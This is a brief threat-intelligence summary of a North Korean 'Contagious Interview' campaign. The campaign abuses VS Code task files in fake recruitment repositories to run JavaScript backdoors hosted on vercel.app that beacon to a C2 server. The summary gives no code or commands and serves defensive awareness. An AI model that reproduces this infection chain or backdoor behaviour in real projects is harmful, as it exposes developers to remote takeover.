VERY IMPORTANT

North Korean threat actors have evolved their techniques in the Contagious Interview campaign, now abusing Microsoft Visual Studio Code task configuration files. The infection chain begins when a victim opens a malicious Git repository, often disguised as part of a recruitment process. If trust is granted, arbitrary commands are executed on the system. The malware uses JavaScript payloads hosted on vercel.app to implement backdoor logic, including remote code execution, system fingerprinting, and persistent command-and-control communication. The backdoor collects host information and beacons to a C2 server every five seconds. Recent observations show further execution of similar payloads, indicating ongoing development of these tactics.